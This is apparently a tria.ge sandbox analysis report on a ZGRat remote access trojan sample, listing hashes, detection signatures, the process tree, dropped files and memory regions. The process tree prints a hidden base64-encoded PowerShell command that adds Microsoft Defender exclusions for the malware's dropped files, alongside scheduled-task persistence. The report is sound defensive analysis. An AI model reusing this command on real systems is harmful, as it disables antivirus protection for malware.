Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    29/03/2024, 02:00

General

  • Target

    0412820e4dacf521808629f37fff8e32aa554c0d9096b7800921c8ae1cfcb0c5.exe

  • Size

    5.1MB

  • MD5

    71ee7a0d612a6530ccfd22c79bbf0695

  • SHA1

    0e7413e80de750d661c132a0dd88c014dbfd2398

  • SHA256

    0412820e4dacf521808629f37fff8e32aa554c0d9096b7800921c8ae1cfcb0c5

  • SHA512

    0cf425fcb5468f16cf79b080e48de65918608842c38a194ce847f7624e66a5b2ede586dc5246ce4460ed006ec5058d4e659079a393914a6adee0e5e643347e0a

  • SSDEEP

    98304:2rHq3FSVIErWayHeVd0q2rVMPMKhV83eZe/LFx:2jqVSVKH0d0q2rfP3lr

Score
10/10

Malware Config

Signatures

  • Detect ZGRat V1 35 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\0412820e4dacf521808629f37fff8e32aa554c0d9096b7800921c8ae1cfcb0c5.exe
    "C:\Users\Admin\AppData\Local\Temp\0412820e4dacf521808629f37fff8e32aa554c0d9096b7800921c8ae1cfcb0c5.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2040
    • C:\Users\Admin\AppData\Local\Temp\Vbcmzog.exe
      "C:\Users\Admin\AppData\Local\Temp\Vbcmzog.exe"
      2⤵
      • Executes dropped EXE
      PID:2116
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {CC120FE5-F5FC-48AA-B0D6-038DAEA1C03C} S-1-5-21-2721934792-624042501-2768869379-1000:BISMIZHX\Admin:S4U:
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2780
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQwB1AHIAcgBlAG4AdABcAEEAYwB0AGkAdgBhAHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQwB1AHIAcgBlAG4AdABcAEEAYwB0AGkAdgBhAHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuAGUAeABlAA==
      2⤵
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2728
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {9370C1F4-7E1A-47A5-BF2E-3BEEAEAF2C80} S-1-5-21-2721934792-624042501-2768869379-1000:BISMIZHX\Admin:Interactive:[1]
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1620
    • C:\Users\Admin\AppData\Roaming\Current\ActivationContext.exe
      C:\Users\Admin\AppData\Roaming\Current\ActivationContext.exe
      2⤵
      • Executes dropped EXE
      PID:1572

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Vbcmzog.exe

    Filesize

    837KB

    MD5

    ec0362e81436b8e7cccb93fa43220fdb

    SHA1

    f4d7b2d844f995c8466aa13ff2f17aab052e14bc

    SHA256

    3e4d82399a8774a79b23814dcae1ce2e38ac565241f0d78e6473269705d2d96c

    SHA512

    cdd02d02cab7fc9ba7c7fab35cc35cbb29b2a40dbbf999dc2222c6449bb70522d91132c7476cb867e7320266d630b1f9d0541d11a076a64f00e426cb342e5700

  • \Users\Admin\AppData\Roaming\Current\ActivationContext.exe

    Filesize

    5.1MB

    MD5

    71ee7a0d612a6530ccfd22c79bbf0695

    SHA1

    0e7413e80de750d661c132a0dd88c014dbfd2398

    SHA256

    0412820e4dacf521808629f37fff8e32aa554c0d9096b7800921c8ae1cfcb0c5

    SHA512

    0cf425fcb5468f16cf79b080e48de65918608842c38a194ce847f7624e66a5b2ede586dc5246ce4460ed006ec5058d4e659079a393914a6adee0e5e643347e0a

  • memory/1572-5380-0x000000001BD90000-0x000000001BE10000-memory.dmp

    Filesize

    512KB

  • memory/1572-5332-0x000007FEF5C80000-0x000007FEF666C000-memory.dmp

    Filesize

    9.9MB

  • memory/1572-4893-0x000000001BD90000-0x000000001BE10000-memory.dmp

    Filesize

    512KB

  • memory/1572-4891-0x000007FEF5C80000-0x000007FEF666C000-memory.dmp

    Filesize

    9.9MB

  • memory/1572-4892-0x0000000001130000-0x0000000001642000-memory.dmp

    Filesize

    5.1MB

  • memory/2040-67-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-4785-0x000000001DC50000-0x000000001DE2C000-memory.dmp

    Filesize

    1.9MB

  • memory/2040-15-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-17-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-19-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-21-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-23-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-25-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-27-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-29-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-31-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-33-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-35-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-37-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-39-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-5-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-41-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-4784-0x0000000000650000-0x0000000000651000-memory.dmp

    Filesize

    4KB

  • memory/2040-45-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-4-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-47-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-49-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-51-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-53-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-57-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-55-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-59-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-63-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-61-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-11-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-65-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-4556-0x000007FEF5C80000-0x000007FEF666C000-memory.dmp

    Filesize

    9.9MB

  • memory/2040-13-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-4783-0x000000001C260000-0x000000001C2E0000-memory.dmp

    Filesize

    512KB

  • memory/2040-43-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-4786-0x0000000002920000-0x000000000296C000-memory.dmp

    Filesize

    304KB

  • memory/2040-4792-0x0000000002A60000-0x0000000002AB4000-memory.dmp

    Filesize

    336KB

  • memory/2040-4837-0x000000001C260000-0x000000001C2E0000-memory.dmp

    Filesize

    512KB

  • memory/2040-4856-0x000000001C950000-0x000000001CA04000-memory.dmp

    Filesize

    720KB

  • memory/2040-4863-0x000000001C260000-0x000000001C2E0000-memory.dmp

    Filesize

    512KB

  • memory/2040-0-0x0000000000CD0000-0x00000000011E2000-memory.dmp

    Filesize

    5.1MB

  • memory/2040-4864-0x000000001C260000-0x000000001C2E0000-memory.dmp

    Filesize

    512KB

  • memory/2040-4865-0x000000001DE30000-0x000000001DF32000-memory.dmp

    Filesize

    1.0MB

  • memory/2040-4867-0x000000001BC20000-0x000000001BC76000-memory.dmp

    Filesize

    344KB

  • memory/2040-4866-0x0000000002B40000-0x0000000002B48000-memory.dmp

    Filesize

    32KB

  • memory/2040-4868-0x000000001D330000-0x000000001D384000-memory.dmp

    Filesize

    336KB

  • memory/2040-4869-0x000000001C260000-0x000000001C2E0000-memory.dmp

    Filesize

    512KB

  • memory/2040-1-0x000007FEF5C80000-0x000007FEF666C000-memory.dmp

    Filesize

    9.9MB

  • memory/2040-2-0x000000001C260000-0x000000001C2E0000-memory.dmp

    Filesize

    512KB

  • memory/2040-3-0x000000001C5C0000-0x000000001C956000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-7-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-9-0x000000001C5C0000-0x000000001C950000-memory.dmp

    Filesize

    3.6MB

  • memory/2040-4885-0x000007FEF5C80000-0x000007FEF666C000-memory.dmp

    Filesize

    9.9MB

  • memory/2116-4886-0x000000001AB50000-0x000000001ABD0000-memory.dmp

    Filesize

    512KB

  • memory/2116-4793-0x0000000000260000-0x0000000000338000-memory.dmp

    Filesize

    864KB

  • memory/2116-4795-0x000000001AD70000-0x000000001AE86000-memory.dmp

    Filesize

    1.1MB

  • memory/2116-4880-0x000007FEF5C80000-0x000007FEF666C000-memory.dmp

    Filesize

    9.9MB

  • memory/2116-4794-0x000007FEF5C80000-0x000007FEF666C000-memory.dmp

    Filesize

    9.9MB

  • memory/2116-4796-0x000000001AB50000-0x000000001ABD0000-memory.dmp

    Filesize

    512KB

  • memory/2728-4874-0x000000001A410000-0x000000001A6F2000-memory.dmp

    Filesize

    2.9MB

  • memory/2728-4882-0x000007FEEDCD0000-0x000007FEEE66D000-memory.dmp

    Filesize

    9.6MB

  • memory/2728-4875-0x0000000000A40000-0x0000000000A48000-memory.dmp

    Filesize

    32KB

  • memory/2728-4876-0x000007FEEDCD0000-0x000007FEEE66D000-memory.dmp

    Filesize

    9.6MB

  • memory/2728-4877-0x0000000001890000-0x0000000001910000-memory.dmp

    Filesize

    512KB

  • memory/2728-4881-0x0000000001890000-0x0000000001910000-memory.dmp

    Filesize

    512KB

  • memory/2728-4879-0x000007FEEDCD0000-0x000007FEEE66D000-memory.dmp

    Filesize

    9.6MB

  • memory/2728-4878-0x0000000001890000-0x0000000001910000-memory.dmp

    Filesize

    512KB